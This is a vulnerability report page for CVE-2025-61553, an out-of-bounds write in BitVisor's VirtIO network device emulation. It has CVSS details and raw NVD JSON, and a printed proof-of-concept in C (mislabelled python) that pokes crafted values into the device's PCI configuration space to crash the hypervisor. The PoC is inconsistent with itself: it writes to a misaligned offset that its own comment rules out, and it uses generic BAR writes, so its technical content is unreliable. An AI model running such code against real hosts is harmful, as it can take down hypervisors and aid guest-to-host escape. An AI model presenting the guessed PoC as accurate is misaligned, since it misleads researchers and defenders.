Security Vulnerability Report
中文
CVE-2025-61553 CVSS 8.2 HIGH

CVE-2025-61553

Published: 2025-10-16 19:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An out-of-bounds write in VirtIO network device emulation in BitVisor from commit 108df6 (2020-05-20) to commit 480907 (2025-07-06) allows local attackers to cause a denial of service (host hypervisor crash) via a crafted PCI configuration space access. Given it's a heap overflow in a privileged hypervisor context, exploitation may enable arbitrary code execution or guest-to-host privilege escalation.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

BitVisor commit 108df6(2020-05-20)至 commit 480907(2025-07-06)之间的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2025-61553 - BitVisor VirtIO Network Device OOB Write PoC * This PoC demonstrates triggering an out-of-bounds write in BitVisor's * VirtIO network device emulation via crafted PCI configuration space access. * * Note: This requires running inside a BitVisor guest VM with elevated privileges * to access PCI configuration space of the VirtIO network device. * * Compile: gcc -o poc poc.c -lpci */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/io.h> #include <pci/pci.h> #define VIRTIO_NET_VENDOR_ID 0x1AF4 #define VIRTIO_NET_DEVICE_ID 0x1000 #define PCI_CONFIG_ADDR 0xCF8 #define PCI_CONFIG_DATA 0xCFC /* Find VirtIO network device on PCI bus */ int find_virtio_net_device(int *bus, int *dev, int *func) { struct pci_access *pacc; struct pci_dev *dev_ptr; int found = 0; pacc = pci_alloc(); pci_init(pacc); pci_scan_bus(pacc); for (dev_ptr = pacc->devices; dev_ptr; dev_ptr = dev_ptr->next) { pci_fill_info(dev_ptr, PCI_FILL_IDENT | PCI_FILL_BASES); if (dev_ptr->vendor_id == VIRTIO_NET_VENDOR_ID && dev_ptr->device_id == VIRTIO_NET_DEVICE_ID) { *bus = dev_ptr->bus; *dev = dev_ptr->dev; *func = dev_ptr->func; found = 1; printf("[+] Found VirtIO Net device at %02x:%02x.%d\n", *bus, *dev, *func); break; } } pci_cleanup(pacc); return found; } /* Crafted PCI config space write to trigger OOB write */ void trigger_oob_write(int bus, int dev, int func) { unsigned int config_addr; unsigned int crafted_value; int ret; /* Request I/O port access for PCI configuration */ ret = iopl(3); if (ret < 0) { perror("[-] iopl failed - need root privileges"); return; } /* Build PCI configuration space address * Bit 31: Enable bit * Bits 23-16: Bus number * Bits 15-11: Device number * Bits 10-8: Function number * Bits 7-2: Register offset (multiplied by 4) * Bits 1-0: Always 0 */ /* Target an out-of-bounds offset in the device's internal buffer * The vulnerability is triggered when writing to a specific * PCI config space register that maps to the VirtIO device's * internal state buffer without proper bounds checking */ /* Attempt 1: Write to an extended config space offset */ config_addr = (1 << 31) | (bus << 16) | (dev << 11) | (func << 8) | 0xFF; crafted_value = 0xDEADBEEF; printf("[*] Attempting crafted PCI config write to trigger OOB...\n"); outl(config_addr, PCI_CONFIG_ADDR); outl(crafted_value, PCI_CONFIG_DATA); /* Attempt 2: Write to BAR-related registers with crafted values */ for (int offset = 0x10; offset <= 0x28; offset += 4) { config_addr = (1 << 31) | (bus << 16) | (dev << 11) | (func << 8) | offset; outl(config_addr, PCI_CONFIG_ADDR); outl(0x41414141, PCI_CONFIG_DATA); } printf("[*] PoC executed. If vulnerable, hypervisor may crash.\n"); } int main(int argc, char *argv[]) { int bus = 0, dev = 0, func = 0; printf("=== CVE-2025-61553 BitVisor VirtIO OOB Write PoC ===\n"); printf("[*] Searching for VirtIO network device...\n"); if (!find_virtio_net_device(&bus, &dev, &func)) { printf("[-] VirtIO network device not found\n"); return 1; } trigger_oob_write(bus, dev, func); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61553", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:33.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds write in VirtIO network device emulation in BitVisor from commit 108df6 (2020-05-20) to commit 480907 (2025-07-06) allows local attackers to cause a denial of service (host hypervisor crash) via a crafted PCI configuration space access. Given it's a heap overflow in a privileged hypervisor context, exploitation may enable arbitrary code execution or guest-to-host privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/retrage/advisories/blob/main/CVE-2025-61553/README.md", "source": "[email protected]"}, {"url": "https://sourceforge.net/p/bitvisor/code/ci/48090711ade5910b601d2b0034859a6a890cc82d/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.